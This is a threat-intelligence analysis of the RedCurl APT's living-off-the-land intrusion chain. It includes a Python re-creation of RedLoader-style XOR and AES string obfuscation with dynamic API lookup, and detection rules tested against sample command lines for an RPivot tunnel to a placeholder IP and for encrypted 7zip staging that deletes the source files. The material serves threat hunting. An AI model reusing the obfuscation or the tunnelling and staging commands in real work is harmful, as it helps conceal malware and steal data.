Researchers identified RedCurl APT group activity in Canada in late 2024, where the attackers used scheduled tasks to execute pcalua.exe, which in turn ran malicious binaries and Python scripts, including the RPivot client.py script used to connect to a remote server.
Evidence points to data exfiltration to cloud storage; the group targets numerous industries and aims for long-term persistence so that it can keep collecting data.
The RedCurl malware uses PowerShell to download files from a cloud storage location at bora.teracloud[.]jp/dav via HTTP GET requests; the downloads are then unpacked with 7zip using a password stored in the batch file.


The script then uses Python to execute client.py (an RPivot tool from GitHub) to connect to a predefined IP and port, while the malware harvests system information, including directory listings and running processes, archives and encrypts it with 7zip, and exfiltrates the data to the C2 server via HTTP PUT requests.
RedLoader, a backdoor component of the RedCurl malware, uses obfuscation to evade detection: it decrypts the names of the DLLs it needs first, such as bcrypt.dll, with a rolling XOR routine and then dynamically resolves functions within them.


Encrypted function names are decrypted with the same routine. The functions resolved from bcrypt.dll are then used to generate symmetric keys for a further decryption stage that recovers more sensitive DLL names.
A SHA256 hash of a static key (“PpMYfs0fQp5ERT”) serves as the basis for generating an AES key, adding another layer of encryption that shows the actor's intent to conceal the malware's true purpose and hinder analysis.
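The two decryption layers described above, as an added example that is not RedLoader's own code and not taken from the analysis: a rolling XOR over DLL and function names followed by an AES-256 key derived as SHA-256 of the static string. The exact XOR scheme RedLoader uses is not given on the page, so the one here (the previous ciphertext byte becomes the next key byte, seeded with a single byte) and the sample encrypted blobs are assumptions; the static string is the one named in the analysis.

```python
"""String-decryption layers of the kind attributed to RedLoader above.
Added example; the rolling-XOR scheme, the 0x5A seed and the encrypted
sample blobs are assumptions, not RedLoader's actual routine."""
import ctypes
import hashlib
import sys

STATIC_KEY = b"PpMYfs0fQp5ERT"   # static string named in the analysis


def rolling_xor(data: bytes, seed: int, decrypt: bool) -> bytes:
    """Rolling XOR: byte i is XORed with key_i, where key_0 = seed and
    key_{i+1} = ciphertext_i. Encryption and decryption share the loop; the
    only difference is which side of the XOR feeds the next key (assumed scheme)."""
    out = bytearray()
    key = seed & 0xFF
    for b in data:
        x = b ^ key
        out.append(x)
        key = b if decrypt else x   # the ciphertext byte drives the next key
    return bytes(out)


def encrypt_name(name: str, seed: int = 0x5A) -> bytes:
    return rolling_xor(name.encode("ascii"), seed, decrypt=False)


def decrypt_name(blob: bytes, seed: int = 0x5A) -> str:
    return rolling_xor(blob, seed, decrypt=True).decode("ascii")


def derive_aes_key(static: bytes = STATIC_KEY) -> bytes:
    """SHA-256 of the static string yields 32 bytes, i.e. an AES-256 key.
    Assumption: the digest is used directly; the analysis only calls it the basis."""
    return hashlib.sha256(static).digest()


def resolve_api(dll_name: str, func_name: str):
    """Dynamic resolution after decryption (LoadLibrary + GetProcAddress).
    Returns the address on Windows and None elsewhere so the demo runs anywhere."""
    if sys.platform != "win32":
        return None
    module = ctypes.WinDLL(dll_name)
    return ctypes.cast(getattr(module, func_name), ctypes.c_void_p).value


# Constructed blob: "bcrypt.dll" encrypted with encrypt_name() and seed 0x5A.
ENC_DLL = bytes.fromhex("385b295020547a1e721e")
# The function name is encrypted at import time so the round trip is visible.
ENC_FUNC = encrypt_name("BCryptGenerateSymmetricKey")


def unpack_strings():
    """Recover the DLL and export names the loader would resolve next."""
    return decrypt_name(ENC_DLL), decrypt_name(ENC_FUNC)


if __name__ == "__main__":
    dll, func = unpack_strings()
    print(f"DLL: {dll}  export: {func}")
    print(f"address: {resolve_api(dll, func)}")
    print(f"AES-256 key (SHA-256 of static string): {derive_aes_key().hex()}")
```

For a hunter, the useful part is the ordering: the XOR layer has to be defeated first to learn which crypto exports are pulled in, and only then does the SHA-256-derived key make sense as the input to the next AES stage.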
Adversaries are increasingly using living-off-the-land (LOTL) techniques, carrying out attacks with legitimate native Windows binaries and tools to accomplish malicious goals.
This makes LOTL attacks difficult to distinguish from normal system administration activity; in this case, the attackers used pcalua.exe inside scheduled tasks to execute malicious files and scripts.


RedCurl uses various techniques to infiltrate systems, relies on legitimate cloud storage for exfiltration, and leverages batch files, PowerShell, and Python scripts to carry out its attacks.
According to Huntress, both the extraction of files from password-protected archives and the creation of archives for data exfiltration are largely done with 7zip.
Security analysts can hunt for Python scripts that make network connections, for example by identifying processes that generate network traffic and looking for Python executables among them, and can look for the 7zip process run with the specific flags used to create password-protected archives and delete the original files.
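The hunting guidance above, and the execution chain described earlier (pcalua.exe launched from a scheduled task, 7zip archiving with a password and deleting sources, a Python RPivot client reaching out to a remote host), as an added example that is not code from Huntress or from RedCurl. The rules run over constructed Sysmon-style process-creation and network-connection records; the paths, IPs, password and the RPivot argument names in the sample records are assumptions made for the demonstration, and the "internal" address ranges are a plain RFC 1918 plus loopback list.

```python
"""Hunting logic for the RedCurl tradecraft described above, run over constructed
process-creation and network-connection records. Added example, not Huntress's
or RedCurl's code; all sample telemetry below is constructed."""
import ipaddress
import re
from dataclasses import dataclass


@dataclass
class Event:
    kind: str            # "proc" = process creation, "net" = network connection
    image: str           # full path of the process image
    cmdline: str = ""    # command line (proc events)
    parent: str = ""     # parent image (proc events)
    dest_ip: str = ""    # destination address (net events)


# Ranges treated as internal; any other destination counts as external (assumption).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
SEVENZIP = {"7z.exe", "7za.exe", "7zr.exe"}
PYTHON = {"python.exe", "python3.exe", "pythonw.exe"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_external(ip: str) -> bool:
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return not any(addr in net for net in INTERNAL_NETS)


def rule_pcalua_proxy(ev: Event) -> bool:
    """pcalua.exe -a <target>: the Program Compatibility Assistant launcher used
    as a proxy to run another binary or script (the scheduled-task technique)."""
    return (ev.kind == "proc" and basename(ev.image) == "pcalua.exe"
            and re.search(r"(^|\s)-a\s", ev.cmdline) is not None)


def rule_7zip_encrypt_and_delete(ev: Event) -> bool:
    """7-Zip 'a' (add to archive) with -p<password> (encrypted archive) and
    -sdel (delete source files after archiving): the staging pattern."""
    if ev.kind != "proc" or basename(ev.image) not in SEVENZIP:
        return False
    toks = ev.cmdline.split()
    return ("a" in toks[1:] and any(t.startswith("-p") for t in toks)
            and "-sdel" in toks)


def rule_python_rpivot_client(ev: Event) -> bool:
    """python.exe running a client.py that is given --server-ip (assumed to be
    the argument the RPivot client takes for its remote endpoint)."""
    return (ev.kind == "proc" and basename(ev.image) in PYTHON
            and "client.py" in ev.cmdline.lower() and "--server-ip" in ev.cmdline)


def rule_python_external_conn(ev: Event) -> bool:
    """A Python interpreter opening a connection to an external address."""
    return (ev.kind == "net" and basename(ev.image) in PYTHON
            and is_external(ev.dest_ip))


RULES = [rule_pcalua_proxy, rule_7zip_encrypt_and_delete,
         rule_python_rpivot_client, rule_python_external_conn]


def hunt(events):
    """Apply every rule to every event; return (rule name, event) in event order."""
    return [(rule.__name__, ev) for ev in events for rule in RULES if rule(ev)]


# Constructed sample telemetry: four records mirroring the chain, three benign ones.
SAMPLE_EVENTS = [
    Event("proc", r"C:\Windows\System32\pcalua.exe",
          r"pcalua.exe -a C:\Users\Public\Libraries\run.bat",
          parent=r"C:\Windows\System32\svchost.exe"),
    Event("proc", r"C:\Users\Public\Libraries\7z.exe",
          r"7z.exe a -pS3cr3tPass -sdel C:\Users\Public\Libraries\out.7z C:\Users\Public\Libraries\collect\*",
          parent=r"C:\Windows\System32\cmd.exe"),
    Event("proc", r"C:\Users\Public\Libraries\python\python.exe",
          r"python.exe client.py --server-ip 203.0.113.10 --server-port 443",
          parent=r"C:\Windows\System32\cmd.exe"),
    Event("net", r"C:\Users\Public\Libraries\python\python.exe", dest_ip="203.0.113.10"),
    # benign: archive without -p/-sdel, python to an internal host, pcalua without -a
    Event("proc", r"C:\Program Files\7-Zip\7z.exe",
          r'"C:\Program Files\7-Zip\7z.exe" a backup.7z C:\Users\alice\Documents',
          parent=r"C:\Windows\explorer.exe"),
    Event("net", r"C:\Python311\python.exe", dest_ip="10.0.0.5"),
    Event("proc", r"C:\Windows\System32\pcalua.exe", "pcalua.exe",
          parent=r"C:\Windows\explorer.exe"),
]


if __name__ == "__main__":
    for name, ev in hunt(SAMPLE_EVENTS):
        print(f"{name:30} {ev.image}  {ev.cmdline or ev.dest_ip}")
```

The 7zip rule is the highest-signal one in practice: `-p` together with `-sdel` is rare in administrative use, whereas a Python interpreter talking to an external address needs baselining per host before it is worth alerting on.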
Cyberespionage attacks often leverage legitimate software and Living-Off-The-Land (LOTL) techniques to evade detection, which makes continuous monitoring for anomalous behavior necessary.
An effective defense requires proactive threat hunting for novel and unusual behaviors across the network; a multi-layered defense strategy increases the likelihood of spotting suspicious activity and uncovering sophisticated attacks by highly motivated adversaries targeting valuable data.